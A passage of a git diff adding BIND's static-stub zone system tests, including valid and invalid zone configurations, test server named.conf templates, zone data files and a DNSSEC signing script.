distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-name must not be a subdomain of the zone name. +zone "example.com" { + type static-stub; + # server-name is a real subdomain of the zone name. + server-names { "ns.example.com"; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad07.conf b/bin/tests/system/staticstub/conf/bad07.conf new file mode 100644 index 0000000..dd1879f --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad07.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-addresses must not be specified more than once. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; }; + server-addresses { 192.0.2.2; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad08.conf b/bin/tests/system/staticstub/conf/bad08.conf new file mode 100644 index 0000000..c389c9d --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad08.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-names must not be specified more than once. +zone "example.com" { + type static-stub; + server-names { ns1.example.net; }; + server-names { ns2.example.net; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad09.conf b/bin/tests/system/staticstub/conf/bad09.conf new file mode 100644 index 0000000..7e7144a --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad09.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "masters" isn't allowed for a static-stub zone (unlike a stub zone). +zone "example.com" { + type static-stub; + masters { 192.0.2.1; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad10.conf b/bin/tests/system/staticstub/conf/bad10.conf new file mode 100644 index 0000000..b9d2862 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad10.conf @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "server-addresses" isn't allowed for a pure stub zone. +# (or most of other types of zones, but confirming one case should be good +# enough) +zone "example.com" { + type stub; + server-addresses { 192.0.2.1; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad11.conf b/bin/tests/system/staticstub/conf/bad11.conf new file mode 100644 index 0000000..0b97e70 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad11.conf @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "server-names" isn't allowed for a pure stub zone. +# (or most of other types of zones, but confirming one case should be good +# enough) +zone "example.com" { + type stub; + server-names { "ns.example.net"; }; +}; diff --git a/bin/tests/system/staticstub/conf/good01.conf b/bin/tests/system/staticstub/conf/good01.conf new file mode 100644 index 0000000..93f19af --- /dev/null +++ b/bin/tests/system/staticstub/conf/good01.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# both server-addresses and server-names can be specified. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; }; + server-names { "ns.example.net"; }; +}; diff --git a/bin/tests/system/staticstub/conf/good02.conf b/bin/tests/system/staticstub/conf/good02.conf new file mode 100644 index 0000000..6a8a413 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good02.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# both IPv4 and IPv6 server-addresses should be allowable. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; 2001:db8::53; }; +}; diff --git a/bin/tests/system/staticstub/conf/good03.conf b/bin/tests/system/staticstub/conf/good03.conf new file mode 100644 index 0000000..faa9ab3 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good03.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-addresses can be empty, though it's meaningless. +zone "example.com" { + type static-stub; + server-addresses {}; +}; diff --git a/bin/tests/system/staticstub/conf/good04.conf b/bin/tests/system/staticstub/conf/good04.conf new file mode 100644 index 0000000..161e4f0 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good04.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-names can be empty, though it's meaningless. +zone "example.com" { + type static-stub; + server-names {}; +}; diff --git a/bin/tests/system/staticstub/conf/good05.conf b/bin/tests/system/staticstub/conf/good05.conf new file mode 100644 index 0000000..e1db2fd --- /dev/null +++ b/bin/tests/system/staticstub/conf/good05.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# less common options +zone "example.com" { + type static-stub; + allow-query { 127.0.0.1; }; + zone-statistics yes; +}; diff --git a/bin/tests/system/staticstub/knowngood.dig.out.rec b/bin/tests/system/staticstub/knowngood.dig.out.rec new file mode 100644 index 0000000..e854082 --- /dev/null +++ b/bin/tests/system/staticstub/knowngood.dig.out.rec @@ -0,0 +1,18 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 data.child.example txt +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.example, type = TXT, class = IN + +;; ANSWER SECTION: +data.example. 5M IN TXT "some" "test" "data" + +;; Total query time: 8 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:54 2000 +;; MSG SIZE sent: 36 rcvd: 97 + diff --git a/bin/tests/system/staticstub/ns1/named.conf.in b/bin/tests/system/staticstub/ns1/named.conf.in new file mode 100644 index 0000000..985b932 --- /dev/null +++ b/bin/tests/system/staticstub/ns1/named.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify no; +}; + +zone "." { type primary; file "root.db"; }; diff --git a/bin/tests/system/staticstub/ns1/root.db b/bin/tests/system/staticstub/ns1/root.db new file mode 100644 index 0000000..26bc039 --- /dev/null +++ b/bin/tests/system/staticstub/ns1/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example.com. NS example. + +ns.example.net. A 10.53.0.3 diff --git a/bin/tests/system/staticstub/ns2/named.conf.in b/bin/tests/system/staticstub/ns2/named.conf.in new file mode 100644 index 0000000..0724607 --- /dev/null +++ b/bin/tests/system/staticstub/ns2/named.conf.in @@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "trusted.conf"; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type static-stub; + server-addresses { 10.53.0.3; }; + allow-query { !10.53.0.7; any; }; +}; + +zone "example.org" { + type static-stub; + SERVER_CONFIG_PLACEHOLDER +}; + +zone "example.info" { + type static-stub; + server-addresses { ::1; }; #ns4 +}; + +zone "undelegated" { + type static-stub; + server-addresses { 10.53.0.3; }; +}; diff --git a/bin/tests/system/staticstub/ns3/example.db.in b/bin/tests/system/staticstub/ns3/example.db.in new file mode 100644 index 0000000..c3b7d81 --- /dev/null +++ b/bin/tests/system/staticstub/ns3/example.db.in @@ -0,0 +1,32 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA ns3.example. hostmaster.example. ( + 2010080900 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns4.example. ; fake +example. A 10.53.0.4 ; fake +example. AAAA ::1 ; fake + +ns4.example. A 10.53.0.4 +data.example. TXT "some" "test" "data" +data2.example. TXT "2nd test data" +data3.example. TXT "3rd test data" +data4.example. TXT "4th test data" + +sub.example. NS ns.sub.example. +ns.sub.example. A 10.53.0.4 diff --git a/bin/tests/system/staticstub/ns3/example.org.db b/bin/tests/system/staticstub/ns3/example.org.db new file mode 100644 index 0000000..aec2f99 --- /dev/null +++ b/bin/tests/system/staticstub/ns3/example.org.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.org IN SOA ns.example.org. hostmaster.example.org. ( + 2010080906 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.org. NS ns.example.org. +ns.example.org. A 10.53.0.3 + +data.example.org. TXT "example org data" diff --git a/bin/tests/system/staticstub/ns3/named.conf.in b/bin/tests/system/staticstub/ns3/named.conf.in new file mode 100644 index 0000000..cbff743 --- /dev/null +++ b/bin/tests/system/staticstub/ns3/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify no; +}; + +EXAMPLE_ZONE_PLACEHOLDER + +zone "example.org" { + type primary; + file "example.org.db"; +}; + +zone "undelegated" { + type primary; + file "undelegated.db.signed"; +}; diff --git a/bin/tests/system/staticstub/ns3/sign.sh b/bin/tests/system/staticstub/ns3/sign.sh new file mode 100755 index 0000000..111ffaf --- /dev/null +++ b/bin/tests/system/staticstub/ns3/sign.sh @@ -0,0 +1,44 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example. +infile=example.db.in +zonefile=example.db + +(cd ../ns4 && $SHELL -e sign.sh ) + +cp ../ns4/dsset-sub.example$TP . + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone) +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a trusted key. +keyfile_to_static_ds $keyname2 > trusted.conf + +zone=undelegated +infile=undelegated.db.in +zonefile=undelegated.db +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone) +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -g -o $zone $zonefile > /dev/null + +keyfile_to_static_ds $keyname2 >> trusted.conf +cp trusted.conf ../ns2/trusted.conf diff --git a/bin/tests/system/staticstub/ns3/undelegated.db.in b/bin/tests/system/staticstub/ns3/undelegated.db.in new file mode 100644 index 0000000..a7010ef --- /dev/null +++ b/bin/tests/system/staticstub/ns3/undelegated.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +undelegated. IN SOA ns3.undelegated. hostmaster.undelegated. ( + 2010080900 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +undelegated. NS ns3.undelegated. +undelegated. A 10.53.0.4 +undelegated. AAAA ::1 +ns3.undelegated. A 10.53.0.3 diff --git a/bin/tests/system/staticstub/ns4/example.com.db b/bin/tests/system/staticstub/ns4/example.com.db new file mode 100644 index 0000000..3db8fa4 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.com.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.com IN SOA example. hostmaster.example. ( + 2010080701 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.com. NS example. + +data.example.com. TXT "example com data" diff --git a/bin/tests/system/staticstub/ns4/example.info.db b/bin/tests/system/staticstub/ns4/example.info.db new file mode 100644 index 0000000..169c70d --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.info.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.info IN SOA ns.example.info. hostmaster.example.info. ( + 2010080902 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.info. NS ns.example.info. +ns.example.info. A 10.53.0.4 + +data.example.info. TXT "example info data" diff --git a/bin/tests/system/staticstub/ns4/example.org.db b/bin/tests/system/staticstub/ns4/example.org.db new file mode 100644 index 0000000..69dc7e3 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.org.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.org IN SOA ns.example.org. hostmaster.example.org. ( + 2010080908 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.org. NS ns.example.org. +ns.example.org. A 10.53.0.3 + +data.example.org. TXT "example org data" +data2.example.org. TXT "2nd example org data" diff --git a/bin/tests/system/staticstub/ns4/named.conf.in 